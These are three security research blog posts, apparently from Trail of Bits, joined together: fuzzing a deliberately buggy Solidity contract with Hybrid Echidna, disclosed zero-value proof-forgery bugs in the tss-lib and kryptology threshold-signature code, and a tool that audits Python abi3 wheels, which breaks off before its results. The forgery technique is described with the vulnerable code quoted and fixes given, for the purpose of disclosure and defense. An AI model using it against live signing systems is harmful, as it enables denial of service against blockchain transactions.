Hybrid fuzzing: Sharpening the spikes of Echidna

By Tom Malcolm, University of Queensland, Australia

Smart contract fuzzing is an effective bug-finding technique that we use extensively at Trail of Bits during audits. During my internship at Trail of Bits, I helped expand our fuzzing capabilities by working on Hybrid Echidna, a “hybrid fuzzer” that couples our smart contract fuzzer, Echidna, with our symbolic execution framework, Maat, to improve the process of finding bugs. While Echidna is a great tool, it still struggles to discover some bugs. With Hybrid Echidna, we enhance the process to find even more!

Echidna is a property-based fuzzer built by Trail of Bits that is widely used in smart contract bug hunting. (See its README for a list of notable uses of Echidna and some of the vulnerabilities it has found.) It lies in the category of “smart fuzzers,” which use the ABI of a contract and perform static analysis of its source code to make decisions on how best to generate input data.

In this post, we’ll look at an example of a contract with bugs that can be triggered only with very specific 256-bit integer inputs (e.g. 0xee250cacdb8de774585208b1e85445fca3bd09da95683133ed06742b71ec2434). We will first show how Echidna, which uses random fuzzing techniques, struggles to discover the bugs. We’ll then examine how Hybrid Echidna improves upon traditional random fuzzing and see the results for ourselves!

The problem

The following contract contains two bugs (represented as assertion failures). Triggering the bugs requires finding inputs that consist of specific 256-bit integers, which are not hardcoded into the contract’s code. The chance of randomly finding the right input is 1/115792089237316195423570985008687907853269984665640564039457584007913129639936 — which means the bugs are practically impossible to find by relying on random fuzzing alone.
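That denominator is simply 2^256, the number of possible 256-bit values:

$ python -c 'print(2**256)'
115792089237316195423570985008687907853269984665640564039457584007913129639936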

pragma solidity ^0.7.1;
 
contract VulnerableContract {
 
   function func_one(int128 x) public pure {
       if (x / 4 == -20) {
           assert(false); // BUG
       }
   }
 
   function func_two(int128 x) public pure {
       if ((x >> 30) / 7 == 2) {
           assert(false); // BUG
       }
   }
}

When we run Echidna on the contract (by executing the command echidna VulnerableContract.sol --test-mode assertion), it locally saves certain information about its findings. A summary is displayed in the friendly ncurses-esque interface that it greets us with, as shown below:

Although Echidna identified three “interesting” inputs and added them to the fuzzing corpus, none of them resulted in an assertion failure (i.e., a bug). In other words, Echidna failed to trigger the bugs in the contract.

What happened is that Echidna couldn’t find inputs that would meet the conditions required to trigger the buggy execution paths. This is understandable, as the bug conditions are arithmetic equations, and Echidna can only be so smart when it comes to solving such equations. Looking at the coverage files generated by Echidna, we can clearly see the code paths that weren’t covered:

    | pragma solidity ^0.7.1;
*r  |
    | contract VulnerableContract {
    |
*   |    function func_one(int128 x) public pure {
*   |        if (x / 4 == -20) {
    |            assert(false); // BUG
    |        }
    |    }
    |
*   |    function func_two(int128 x) public pure {
*   |        if ((x >> 30) / 7 == 2) {
    |            assert(false); // BUG
    |        }
    |    }
    | }

Echidna can successfully find bugs (and has on many occasions), and at the end of the day, a bug found is a bug found. However, as this example shows, its results could be improved. How, you ask? Well, if only there were a mutation of the tool, some Frankenstein version that combined Echidna with something that could sharpen its ability, forming one super bug-finder—something like a Hybrid Echidna.

Hybrid Echidna to the rescue

Note: If you’d like to follow along here, install the Optik suite of tools by running the following command:

pip install optik-tools

Hybrid Echidna is part of Optik, a new suite of tools for analysis of Ethereum smart contracts. Optik is intended to comprise both standalone tools and tools that improve upon existing ones (typically fuzzers) for dynamically analyzing smart contracts. So far, its sole tool is Hybrid Echidna, which improves upon Echidna by coupling it with Maat, a symbolic execution framework also developed in-house by Trail of Bits. At the beginning of the summer, the Hybrid Echidna codebase was a minimal one that simply ran Echidna. Now, Hybrid Echidna is a complete tool (albeit one still under development) that consistently improves upon Echidna.

How does it work?

At a high level, Hybrid Echidna simply runs Echidna multiple times, interweaving those runs with symbolic analysis to generate new fuzzing inputs. In more depth, the process for fuzzing a contract now looks like this (a rough sketch in code follows the list):

  1. Execute an initial run of Echidna to collect a fuzzing corpus.
  2. For every unique input that is found, symbolically execute the contract with that input and record its coverage.
  3. Review the coverage information for any missed paths.
  4. Use Maat to solve inputs for those paths, and record any new inputs that would lead to the execution of a missed path.
  5. Repeat the process until there are no more inputs that can be found.
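Here is a rough Python-style sketch of that loop. The helper functions (run_echidna, replay_symbolically, and solve_branch) are hypothetical stand-ins for the Echidna and Maat integrations, not Optik’s actual API:

def hybrid_echidna(contract):
    # 1. Initial Echidna run to seed the corpus
    corpus = run_echidna(contract, corpus=set())
    while True:
        new_inputs = set()
        for seed in corpus:
            # 2. Symbolically replay each unique input, recording coverage
            trace = replay_symbolically(contract, seed)
            # 3-4. Ask the solver (Maat) for inputs that reach missed paths
            for branch in trace.uncovered_branches():
                new_inputs.update(solve_branch(branch))
        # 5. Stop once no new inputs can be found
        if new_inputs <= corpus:
            break
        corpus |= new_inputs
        corpus = run_echidna(contract, corpus=corpus)
    return corpus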

So Hybrid Echidna takes the data that Echidna finds, uses Maat to figure out how to change its input to reach difficult paths, and then fuzzes the program again (with the newfound inputs) until it can’t improve upon the findings. Think of Echidna as a contestant on Who Wants to Be a Millionaire?: when Echidna needs a hand, it can “phone a friend” in Maat (and make an unlimited number of calls).

Show me!

Let’s revisit the contract we looked at earlier—the one with two bugs that Echidna overlooked—and see how Hybrid Echidna fares.

We use the following command to run Hybrid Echidna:

hybrid-echidna VulnerableContract.sol --test-mode assertion --corpus-dir hybrid_echidna_output --contract VulnerableContract

Upon running Hybrid Echidna, we are greeted with another friendly UI that provides insight into its performance. This includes timing information and the following key takeaways:

  • Hybrid Echidna found seven unique inputs (five through fuzzing and two through symbolic execution).
  • Two of those inputs resulted in assertion failures (i.e., bugs).
  • The assertion failures occurred in the func_one and func_two functions.

We can quickly verify the inputs that triggered these failures (which are shown in the “Results” section). Take Hybrid Echidna’s input to func_two, 15032385536, and recall that a result of 2 indicates an assertion failure:

$ python -c 'print((15032385536 >> 30) // 7)'
2

As we can see, Hybrid Echidna found an input that meets the very specific condition in func_two, improving upon Echidna’s performance. In other words, it found more bugs!

What’s next?

Despite its current limitations (such as its lack of support for symbolic keccak operations and its inability to account for gas usage), we are already seeing promising results with Hybrid Echidna. These results reinforce our confidence in our approach to fuzzing and make us hopeful that we’ll have even more exciting results to share in the future.

Optik is still under active development. Going forward, we plan to improve the project’s symbolic executor and, more importantly, increase Hybrid Echidna’s scalability by testing it on real-world codebases. Our end goal is for every engineer at Trail of Bits to use Hybrid Echidna when auditing smart contracts.

Try installing Optik and testing out Hybrid Echidna on the VulnerableContract.sol example (or on your own contracts), and let us know what you think!

Specialized Zero-Knowledge Proof failures

By Opal Wright

Zero-knowledge (ZK) proofs are useful cryptographic tools that have seen an explosion of interest in recent years, largely due to their applications to cryptocurrency. The fundamental idea of a ZK proof is that a person with a secret piece of information (a cryptographic key, for instance) can prove something about the secret without revealing the secret itself. Cryptocurrencies are using ZK proofs for all sorts of fun things right now, including anonymity, transaction privacy, and “roll-up” systems that help increase the efficiency of blockchains by using ZK proofs to batch transactions together. ZK proofs are also being used in more general ways, such as allowing security researchers to prove that they know how to exploit a software bug without revealing information about the bug.

As with most things in cryptography, though, it’s hard to get everything right. This blog post is all about a pair of bugs in some special-purpose ZKP code that allow ne’er-do-wells to trick some popular software into accepting invalid proofs of impossible statements. That includes “proving” the validity of invalid inputs to a group signature. This, in turn, can lead to invalid signatures. In blockchain systems that use threshold signatures, like ThorChain and Binance, this could allow an attacker to prevent targeted transactions from completing, creating a denial-of-service attack against the chain as a whole or against specific participants.

Background on discrete log proofs

One specialized ZK proof is a discrete logarithm proof of knowledge. Suppose Bob provides Alice with an RSA modulus N = PQ, where P and Q are very large primes known only to Bob, and Bob wants to prove to Alice that he knows a secret exponent x such that s ≡ t^x (mod N). That is, x is the discrete logarithm of s with respect to base t, and he wants to prove that he knows x without revealing anything about it.

The protocol works as follows (a toy simulation in code follows the list):

  • First, Bob and Alice agree on a security parameter k, which is a positive integer that determines how many iterations of the protocol to perform. In practice, this is usually set to k = 128.
  • Second, Bob randomly samples a_i from Z_Φ(N) for i = 1, 2, …, k, computes corresponding values α_i = t^(a_i) (mod N), and sends α_1, α_2, …, α_k to Alice.
  • Third, Alice responds with a sequence of random bits c_1, c_2, …, c_k.
  • Fourth, Bob computes z_i = a_i + c_i·x and sends z_1, z_2, …, z_k to Alice.
  • Finally, Alice checks that t^(z_i) ≡ α_i·s^(c_i) (mod N) for all i = 1, 2, …, k. If all the checks pass, she accepts the proof and is confident that Bob really knows x. Otherwise, she rejects the proof—Bob may be cheating!
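To make the protocol concrete, here is a toy simulation of it in Python (tiny primes and a small k for illustration only; real deployments use large moduli and k = 128):

import secrets

# Toy parameters: Bob knows P and Q (and thus Φ(N)); Alice knows only N.
P, Q = 1009, 1013
N = P * Q
PHI = (P - 1) * (Q - 1)
k = 32

t = 3
x = 12345                # Bob's secret exponent
s = pow(t, x, N)         # public value: s = t^x (mod N)

# Bob commits: a_i random in Z_Φ(N), α_i = t^(a_i) (mod N)
a = [secrets.randbelow(PHI) for _ in range(k)]
alpha = [pow(t, a_i, N) for a_i in a]

# Alice challenges with random bits c_i
c = [secrets.randbits(1) for _ in range(k)]

# Bob responds: z_i = a_i + c_i*x (computed over the integers)
z = [a_i + c_i * x for a_i, c_i in zip(a, c)]

# Alice verifies: t^(z_i) ≡ α_i * s^(c_i) (mod N) for every i
assert all(pow(t, z_i, N) == (alpha_i * pow(s, c_i, N)) % N
           for z_i, alpha_i, c_i in zip(z, alpha, c))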

Why it works

Suppose Bob doesn’t know x. For each i, Bob has two ways to attempt to fool Alice: one if he thinks Alice will pick c_i = 0, and one if he thinks Alice will pick c_i = 1.

If Bob guesses that Alice will select c_i = 0, he can select a random a_i ∈ Z_N and send Alice α_i = t^(a_i) mod N. If Alice selects c_i = 0, Bob sends Alice z_i = a_i, and Alice sees that t^(z_i) ≡ t^(a_i) ≡ α_i·s^0 ≡ α_i (mod N) and accepts the i-th iteration of the proof. On the other hand, if Alice selects c_i = 1, Bob needs to compute z_i such that t^(z_i) ≡ t^(a_i)·s (mod N). That is, he needs to find the discrete logarithm of t^(a_i)·s, which is equal to a_i + x. However, Bob doesn’t know x, so he can’t compute a z_i that will pass Alice’s check.

On the other hand, if Bob guesses that Alice will select c_i = 1, he can select a random a_i ∈ Z_N and send Alice α_i = t^(a_i)·s^(−1) (mod N). If Alice selects c_i = 1, Bob sends Alice z_i = a_i. Alice sees that t^(z_i) ≡ t^(a_i) ≡ (t^(a_i)·s^(−1))·s ≡ α_i·s (mod N), and accepts the i-th iteration of the proof. But if Alice selects c_i = 0, Bob needs to compute z_i such that t^(z_i) ≡ α_i ≡ t^(a_i)·s^(−1) (mod N), which would require z_i = a_i − x. But again, since Bob doesn’t know x, he can’t compute a z_i that will pass Alice’s check.

The trick is, each of Bob’s guesses has only a 50 percent chance of being right. If any one of Bob’s k guesses for Alice’s c_i values is wrong, Alice will reject the proof as invalid. If Alice is choosing her c_i values randomly, that means Bob’s chances of fooling Alice are about 1 in 2^k.

Typically, Alice and Bob will use parameters like k = 128. Bob has a better chance of hitting the Powerball jackpot four times in a row than he does of guessing all of c_1, c_2, …, c_128 correctly.

In the case of a non-interactive proof, as we’ll see in the code below, we don’t rely on Alice to pick the values c_i. Instead, Bob and Alice each compute a hash of all the values relevant to the proof: c = Hash(N ∥ s ∥ t ∥ α_1 ∥ … ∥ α_k). The bits of c are used as the c_i values. This is called the Fiat-Shamir transform. It’s certainly possible to get the Fiat-Shamir transform wrong, with some pretty nasty consequences, but the bugs discussed in this article will not involve Fiat-Shamir failures.

The code

Our proof structure and verification code come from tss-lib, written by the folks at Binance. We came across this code while reviewing other software, and the Binance folks were super responsive when we flagged this issue for them.

To start with, we have our Proof structure:

type (
    Proof struct {
        Alpha,
        T [Iterations]*big.Int
    }
)

This is a fairly straightforward structure. We have two arrays of large integers, Alpha and T. These correspond, respectively, to the αi and zi values in the mathematical description above. It’s notable that the Proof structure does not incorporate the modulus N or the values s and t.

func (p *Proof) Verify(h1, h2, N *big.Int) bool {
    if p == nil {
        return false
    }
    modN := common.ModInt(N)
    msg := append([]*big.Int{h1, h2, N}, p.Alpha[:]...)
    c := common.SHA512_256i(msg...)
    cIBI := new(big.Int)
    for i := 0; i < Iterations; i++ {
        if p.Alpha[i] == nil || p.T[i] == nil {
            return false
        }
        cI := c.Bit(i)
        cIBI = cIBI.SetInt64(int64(cI))
        h1ExpTi := modN.Exp(h1, p.T[i])
        h2ExpCi := modN.Exp(h2, cIBI)
        alphaIMulH2ExpCi := modN.Mul(p.Alpha[i], h2ExpCi)
        if h1ExpTi.Cmp(alphaIMulH2ExpCi) != 0 {
            return false
        }
    }
    return true
}

This code actually implements the verification algorithm. The arguments h1 and h2 correspond to t and s, respectively. First, it computes the challenge value c. Then, for each bit c_i of c, it computes h1ExpTi = h1^(T_i) mod N and alphaIMulH2ExpCi = Alpha_i·h2^(c_i) mod N.

If h1ExpTi ≠ alphaIMulH2ExpCi for any 0 < i ≤ k, the proof is rejected. Otherwise, it is accepted.

The issue

The thing to notice is that the Verify function doesn’t do any sort of check to validate h1, h2, or any of the elements of p.Alpha or p.T. A lack of validity checks means we can trigger all sorts of fun edge cases. In particular, when it comes to logarithms and exponential relationships, it’s important to look out for zero. Recall that, for any x ≠ 0, we have 0^x = 0. Additionally, for any x, we have 0 ∙ x = 0. We are going to exploit these facts to force the equality check h1ExpTi = alphaIMulH2ExpCi to always pass.

The first impossible thing: Base-0 Discrete Logs

Suppose Bob creates a Proof structure p with the following values:

  • All elements of p.T are positive (that is, z_i > 0 for all i)
  • All elements of p.Alpha are set to 0 (that is, α_i = 0 for all i)

Now consider a call to the Verify function with the following parameters:

  • N is the product of two large primes
  • h1 set to 0 (that is, t = 0)
  • h2 set to any integer (that is, s is unconstrained)

The Verify function will check that t^(z_i) ≡ α_i·s^(c_i) (mod N). On the right-hand side of the relationship, α_i = 0 forces α_i·s^(c_i) = 0. On the left-hand side of the equation, t^(z_i) = 0^(z_i) = 0 because z_i > 0. Thus, the Verify function sees that 0 = 0 and accepts the proof as valid. Recall that the proof is meant to demonstrate that Bob knows the discrete log of s with respect to t. In this case, the Verify routine will believe that Bob knows an integer x such that s ≡ 0^x (mod N) for any s. But if s ∉ {0,1}, that’s impossible!
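A quick sanity check of the forged relation in Python (standing in for the arithmetic that Verify performs, not the tss-lib code itself):

# With t = 0 and every α_i = 0, both sides of t^(z_i) ≡ α_i·s^(c_i) (mod N)
# collapse to 0 whenever z_i > 0, so the check always passes.
N = 1009 * 1013          # toy modulus; a real N is much larger
s, t = 42, 0             # s unconstrained, t forced to 0
z_i, alpha_i = 7, 0      # any z_i > 0 works
for c_i in (0, 1):
    assert pow(t, z_i, N) == (alpha_i * pow(s, c_i, N)) % N   # 0 == 0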

The fix

Preventing this problem is straightforward: validate that h1, h2, and the elements of p.Alpha are all non-zero. As a matter of practice, it is a good idea to validate all cryptographic values provided by another party, ensuring that, for example, elliptic curve points lie on a curve and that integers fall within their appropriate intervals and satisfy any multiplicative properties. In the case of this proof, such validation would include checking that h1, h2, and the elements of p.Alpha are non-zero, relatively prime to N, and fall within the interval [1,N). It would also be a good idea to ensure that N passes some basic checks (such as a bit length check).
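A minimal sketch of that kind of check (illustrative Python, not tss-lib’s actual API):

from math import gcd

def valid_group_element(v, N):
    # Non-zero, inside [1, N), and invertible modulo N
    return v is not None and 1 <= v < N and gcd(v, N) == 1

A verifier would apply this to h1, h2, and every element of p.Alpha (and sanity-check N itself) before performing any modular arithmetic.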

Proof of encryption of a discrete log

In some threshold signature protocols, one of the steps in the signature process involves proving two things simultaneously about a secret integer x that Bob knows:

  • That X = R^x, where X and R are in an order-q group G (typically, G will be the multiplicative group of integers for some modulus, or an elliptic curve group)
  • That a ciphertext c = PaillierEnc_N(x, r) for some randomization value r ∈ Z_N and Bob’s public key N. That is, c = (N + 1)^x·r^N (mod N^2).

(Just for clarity: G is typically specified alongside a maximal-order group generator g ∈ G. It doesn’t get used directly in the protocol, but it does get integrated into a hash calculation – it doesn’t affect the proof, so don’t worry about it too much.)
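For concreteness, here is a toy sketch of the Paillier encryption from the second bullet, mirroring c = (N + 1)^x·r^N (mod N^2):

import secrets
from math import gcd

def paillier_enc(x, N):
    # c = (N + 1)^x * r^N (mod N^2), where r is a random unit mod N
    N2 = N * N
    r = 0
    while gcd(r, N) != 1:
        r = secrets.randbelow(N)
    return (pow(N + 1, x, N2) * pow(r, N, N2)) % N2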

Proving this consistency between the ciphertext c and the discrete logarithm of X ensures that Bob’s contribution to an elliptic curve signature is the same value he contributed at an earlier point in the protocol. This prevents Bob from contributing bogus X values that lead to invalid signatures.

As part of the key generation, a set of “proof parameters” are generated, including a semiprime modulus Ñ (whose factorization is unknown to Alice and Bob), as well as h1 and h2, both coprime to Ñ.

Bob begins by selecting uniform random values α ←$ Z_(q^3), β ←$ Z*_N, γ ←$ Z_q, and ρ ←$ Z_q.

Bob then computes:

Finally, Bob computes a Fiat-Shamir challenge value e = Hash(N,Ñ,h1,h2,g,q,R,X,c,u,z,v,w) and the challenge response values:

Note that s1 and s2 are computed not modulo any value, but over the integers. Bob then sends Alice the proof π_PDL = [z, e, s, s1, s2].

Alice, upon receiving π_PDL, first checks that s1 ≤ q^3; if this check fails, she rejects the proof as invalid. She then computes:

Finally, Alice computes:

If e ≠ ê, she rejects π_PDL as invalid. Otherwise, she accepts π_PDL as valid.

Why it works

First, let’s make sure that a valid proof will validate:

Because û, v̂, and ŵ match u, v, and w (respectively), we will have ê = e, and the proof will validate.

To understand how Bob is prevented from cheating, read this paper and section 6 of this paper.

The code

The following code is taken from the kryptology library’s Paillier discrete log proof implementation. Specifically, the following code is used to compute v̂:


func (p PdlProof) vHatConstruct(pv *PdlVerifyParams) (*big.Int, error) {
    // 5. \hat{v} = s^N . (N + 1)^s_1 . c^-e mod N^2

    // s^N . (N + 1)^s_1 mod N^2
    pedersenInc, err := inc(p.s1, p.s, pv.Pk.N)
    if err != nil {
        return nil, err
    }

    cInv, err := crypto.Inv(pv.C, pv.Pk.N2)
    if err != nil {
        return nil, err
    }
    cInvToE := new(big.Int).Exp(cInv, p.e, pv.Pk.N2)
    vHat, err := crypto.Mul(pedersenInc, cInvToE, pv.Pk.N2)
    if err != nil {
        return nil, err
    }
    return vHat, nil
}

The calling function, Verify, uses vHatConstruct to compute the v̂ value described above. In a valid proof, everything should work out just fine.

The issue

In an invalid proof, things do not work out just fine. In particular, it is possible for Bob to set v = s = 0. When this happens, the value of c is irrelevant: Alice winds up checking that v̂ = 0^N ∙ (N+1)^(s1) ∙ c^(−e) = 0 = v, and accepts the result.

The second impossible thing: Arbitrary Ciphertexts

By exploiting the v̂ = s = 0 issue, Bob can prove that he knows x such that X = R^x, but simultaneously “prove” to Alice that any value c ≠ 0 is a valid ciphertext for x. Bob doesn’t even need to know the factorization of N. Once again, Bob has “proved” the impossible!

This forgery has real security implications. In particular, being able to forge this proof allows Bob to sabotage the threshold signature protocol without being detected. In some systems, this could be used to prevent valid transactions from being performed.

It is worth noting: the specific case of c = 0 will be detected as an error. The line cInv, err := crypto.Inv(pv.C, pv.Pk.N2) attempts to invert c modulo N^2. When c = 0, this function will return an error, causing the vHatConstruct function to return an error in turn.

The fix

Again, this can be prevented by better input validation. Basic validation of the proof would involve checking that z and s are in Z*_N. That is, checking that gcd(z, N) = gcd(s, N) = 1, which forces z ≠ 0 and s ≠ 0. Additionally, there should be checks to ensure s1 ≠ 0 and s2 ≠ 0.

Risks and disclosure

The risk

These bugs were found in repositories that implement the GG20 threshold signature scheme. If attackers exploit the ciphertext malleability bug, they can “prove” the validity of invalid inputs to a group signature, leading to invalid signatures. If a particular blockchain relies on threshold signatures, this could allow an attacker to prevent targeted transactions from completing.

Disclosure

We have reported the issues with tss-lib to Binance, who promptly fixed them. We have also reached out to numerous projects that rely on tss-lib (or, more commonly, forks of tss-lib). This includes ThorChain, who have also fixed the code; Joltify and SwipeChain rely directly on the ThorChain fork. Additionally, Keep Networks maintains their own fork of tss-lib; they have integrated fixes.

The issue with kryptology has been reported to Coinbase. The kryptology project on GitHub has since been archived. We were not able to identify any current projects that rely on the library’s threshold signature implementation.

The moral of the story

In the end, this is a cryptographic failure stemming from a completely understandable data validation oversight. Values provided by another party should always be checked against all applicable constraints before being used. Heck, values computed from values provided by another party should always be checked against all applicable constraints.

But if you look at mathematical descriptions of these ZK proofs, or even well-written pseudocode, where are these constraints spelled out? These documents describe the algorithms mathematically, not concretely. You see steps such as β ←$ Z*_N, followed later by v = (N + 1)^α·β^N (mod N^2). From a mathematical standpoint, it’s understood that v is in Z*_(N^2), and thus v ≠ 0. From a programming standpoint, though, there’s no explicit indication that there’s a constraint to check on v.

Trail of Bits maintains a resource guide for ZK proof systems at zkdocs.com. These types of issues are one of our primary motivations for such guidance—translating mathematical and theoretical descriptions into software is a difficult process. Admittedly, some of our own descriptions could explain these checks more clearly; we’re hoping to have that fixed in an upcoming release.

One piece of guidance that Trail of Bits likes to give auditors and cryptographers is to look out for two special values: 0 and 1 (as well as their analogues, like the point at infinity). Bugs related to 0 or its analogues have caused problems in the past (for instance, here and here). In this case, a failure to check for 0 leads to two separate bugs that allow attackers in a threshold signature scheme to lead honest parties down a rabbit hole.

ABI compatibility in Python: How hard could it be?

TL;DR: Trail of Bits has developed abi3audit, a new Python tool for checking Python packages for CPython application binary interface (ABI) violations. We’ve used it to discover hundreds of inconsistently and incorrectly tagged package distributions, each of which is a potential source of crashes and exploitable memory corruption due to undetected ABI differences. It’s publicly available under a permissive open source license, so you can use it today!

Python is one of the most popular programming languages, with a correspondingly large package ecosystem: over 600,000 programmers use PyPI to distribute over 400,000 unique packages, powering much of the world’s software.

The age of Python’s packaging ecosystem also sets it apart: among general-purpose languages, it is predated only by Perl’s CPAN. This, combined with the mostly independent development of packaging tooling and standards, has made Python’s ecosystem among the more complex of the major programming language ecosystems. Those complexities include:

  • Two major current packaging formats (source distributions and wheels), as well as a smattering of domain-specific and legacy formats (zipapps, Python Eggs, conda’s own format, &c.);

  • A constellation of different packaging tools and package specification files: setuptools, flit, poetry, and PDM, as well as pip, pipx, and pipenv for actually installing packages;

  • …and a corresponding constellation of package and dependency specification files: pyproject.toml (PEP 518-style), pyproject.toml (Poetry-style), setup.py, setup.cfg, Pipfile, requirements.txt, MANIFEST.in, and so forth.

This post will cover just one tiny piece of Python packaging’s complexity: the CPython stable ABI. We’ll see what the stable ABI is, why it exists, how it’s integrated into Python packaging, and how each piece goes terribly wrong to make accidental ABI violations easy.

The CPython stable API and ABI

Not unlike many other reference implementations, Python’s reference implementation (CPython) is written in C and provides two mechanisms for native interaction:

  • A C Application Programming Interface (API), allowing C and C++ programmers to compile against CPython’s public headers and use any exposed functionality;

  • An Application Binary Interface (ABI), allowing any language with C ABI support (like Rust or Golang) to link against CPython’s runtime and use the same internals.

Developers can use the CPython API and ABI to write CPython extensions. These extensions behave exactly like ordinary Python modules but interact directly with the interpreter’s implementation details rather than the “high-level” objects and APIs exposed in Python itself.

CPython extensions are a cornerstone of the Python ecosystem: they provide an “escape hatch” for performance-critical tasks in Python, as well as enable code reuse from native languages (like the broader C, C++, and Rust packaging ecosystems).

At the same time, extensions pose a problem: CPython’s APIs change between releases (as the implementation details of CPython change), meaning that it is unsound, by default, to load a CPython extension into an interpreter of a different version. The implications of this unsoundness vary: a user might get lucky and have no problems at all, might experience crashes due to missing functions or, worst of all, experience memory corruption due to changes in function signatures and structure layouts.

To ameliorate the situation, CPython’s developers created the stable API and ABI: a set of macros, types, functions, and data objects that are guaranteed to remain available and forward-compatible between minor releases. In other words: a CPython extension built for CPython 3.7’s stable API will also load and function correctly on CPython 3.8 and forwards, but is not guaranteed to load and function with CPython 3.6 or earlier.

At the ABI level, this compatibility is referred to as “abi3”, and is optionally tagged in the extension’s filename: mymod.abi3.so, for example, designates a loadable stable-ABI-compatible CPython extension module named mymod. Critically, the Python interpreter does not do anything with this tag — it’s simply ignored.

This is the first strike: CPython has no notion of whether an extension is actually stable-ABI-compatible. We’ll now see how this compounds with the state of Python packaging to produce even more problems.

CPython extensions and packaging

On its own, a CPython extension is just a bare Python module. To be useful to others, it needs to be packaged and distributed like all other modules.

With source distributions, packaging a CPython extension is straightforward (for some definitions of straightforward): the source distribution’s build system (generally setup.py) describes the compilation steps needed to produce the native extension, and the package installer runs these steps during installation.

For example, here’s how we define microx’s native extension (microx_core) using setuptools:
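In sketch form (the exact microx build script differs, and the source path here is hypothetical):

from setuptools import setup, Extension

setup(
    name="microx",
    ext_modules=[
        Extension(
            "microx_core",                       # the native extension module
            sources=["microx/microx_core.cpp"],  # hypothetical source path
        )
    ],
)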

Distributing a CPython extension via source distribution has advantages (✅) and disadvantages (❌):

    ✅ API and ABI stability are non-issues: the package either builds during installation or it doesn’t; when it does build, it runs against the same interpreter that it built against.

    ❌ Source builds are burdensome for users: they require end users of Python software to install the CPython development headers, as well as maintain a native toolchain corresponding to the language or ecosystem that the extension targets. That means requiring a C/C++ (and increasingly, Rust) toolchain on every deployment machine, adding size and complexity.

    ❌ Source builds are fundamentally fragile: compilers and native dependencies are in constant flux, leaving end users (who are Python experts at best, not compiled language experts) to debug compiler and linker errors.

The Python packaging ecosystem’s solution to these problems is wheels. Wheels are a binary distribution format, which means that they can (but are not required to) provide pre-compiled binary extensions and other shared objects that can be installed as-is, without custom build steps. This is where ABI compatibility is absolutely essential: binary wheels are loaded blindly by the CPython interpreter, so any mismatch between the actual and expected interpreter ABIs can cause crashes (or worse, exploitable memory corruption).

Because wheels can contain pre-compiled extensions, they need to be tagged for the version(s) of Python that they support. This tagging is done with PEP 425-style “compatibility” tags: microx-1.4.1-cp37-cp37m-macosx_10_15_x86_64.whl designates a wheel that was built for CPython 3.7 on macOS 10.15 for x86-64, meaning that other Python versions, host OSes, and architectures should not attempt to install it.

On its own, this limitation makes wheel packaging for CPython extensions a bit of a hassle:

    ❌ In order to support all valid combinations of {Python Version, Host OS, Host Architecture}, the packager must build a valid wheel for each. This means additional test, build, and distribution complexity, as well as exponential CI growth as a package’s support matrix expands.

    ❌ Because wheels are (by default) tied to a single Python version, packagers are required to generate a new set of wheels on each Python minor version change. In other words: new Python versions start out without access to a significant chunk of the packaging ecosystem until packagers can play catch-up.

This is where the stable ABI becomes critical: instead of building one wheel per Python version, packagers can build an “abi3” wheel for the lowest supported Python version. This comes with the guarantee that the wheel will work on all future (minor) releases, solving both the build matrix size problem and the ecosystem bootstrapping problem above.

Building an “abi3” wheel is a two-step process: the wheel is built locally (usually using the same build system as the source distribution) and then retagged with abi3 as the ABI tag rather than a single Python version (like cp37 for CPython 3.7).

Critically: neither of these steps is validated, because Python’s build tools have no good way to validate them. This leaves us with the second and third strikes:

  • To correctly build a wheel against the stable API and ABI, the build needs to set the Py_LIMITED_API macro to the intended CPython support version (or, for Rust with PyO3, to use the correct build feature). This prevents Python’s C headers from using non-stable functionality or potentially inlining incompatible implementation details.

For example, to build a wheel as cp37-abi3 (stable ABI for CPython 3.7+), the extension needs to either #define Py_LIMITED_API 0x03070000 in its own source code, or use the setuptools.Extension construct’s define_macros argument to configure it. These are easy to forget, and produce no warning when forgotten!
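For instance, a correctly configured setuptools build for a hypothetical extension named mymod might look like this:

from setuptools import setup, Extension

setup(
    name="mymod",  # hypothetical package
    ext_modules=[
        Extension(
            "mymod",
            sources=["mymod.c"],
            # Restrict the build to the stable API/ABI for CPython 3.7+
            define_macros=[("Py_LIMITED_API", "0x03070000")],
            # Adds the .abi3 tag to the built extension (but see below)
            py_limited_api=True,
        )
    ],
)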

Additionally, when using setuptools, the packager may choose to set py_limited_api=True. But this does not enable any actual API restrictions; it merely adds the .abi3 tag to the built extension’s filename. As you’ll recall, this tag is not currently checked by the CPython interpreter, so this is effectively a no-op.

Critically, it does not affect the actual wheel build. The wheel is built however the underlying setuptools.Extension sees fit: it might be completely right, it might be a little wrong (stable ABI, but for the wrong CPython version), or it might be completely wrong.

This breakdown happens because of the devolved nature of Python packaging: the code that builds extensions is in pypa/setuptools, while the code that builds wheels is in pypa/wheel — two completely separate codebases. Extension building is designed as a black box, a fact that Rust and other language ecosystems take advantage of (there is no Py_LIMITED_API macro to sensibly define in a PyO3-based extension — it’s all handled separately by build features).

To summarize:

  • Stable ABI (“abi3”) wheels are the only reliable way to package native extensions without a massive build matrix.

  • However, none of the dials that control abi3-compatible wheel building talk to each other: it’s possible to build an abi3-compatible wheel without tagging it as such, to build a non-abi3 wheel and tag it incorrectly as compatible, or to tag an abi3-compatible wheel as compatible with the wrong CPython version.

  • Consequently, the correctness of the current abi3-compatible wheel ecosystem is suspect. ABI violations are capable of causing crashes and even exploitable memory corruption, so we need to quantify the current state of affairs.

How bad is it, really?

This all seems pretty bad, but it’s just an abstract problem: it’s entirely possible that every Python packager gets their wheel builds right, and hasn’t published any incorrectly tagged (or completely invalid) abi3-style wheels.

To get a sense for how bad things really are, we developed abi3audit. Abi3audit’s entire raison d’être is finding these kinds of ABI violation bugs: it scans individual extensions, Python wheels (which can contain multiple extensions), and entire package histories, reporting back anything that doesn’t match the specified stable ABI version or is entirely incompatible with the stable ABI.

To get a list of auditable packages to feed into abi3audit, I used PyPI’s public BigQuery dataset to generate a list of every abi3-wheel-containing package downloaded from PyPI in the last 21 days:

#standardSQL
SELECT DISTINCT file.project
FROM `bigquery-public-data.pypi.file_downloads`
WHERE file.filename LIKE '%abi3%'
  -- Only query the last 21 days of history
  AND DATE(timestamp)
    BETWEEN DATE_SUB(CURRENT_DATE(), INTERVAL 21 DAY)
    AND CURRENT_DATE()

(I chose 21 days because I blew through my BigQuery quota while testing. It’d be interesting to see the full list of downloads over a year or the entire history of PyPI, although I’d expect diminishing returns.)

From that query, I got 357 packages, which I’ve uploaded as a GitHub Gist. With those packages saved, a JSON report from abi3audit was only a single invocation away:

The JSON from that audit is also available as a GitHub Gist.

First, some high-level statistics:

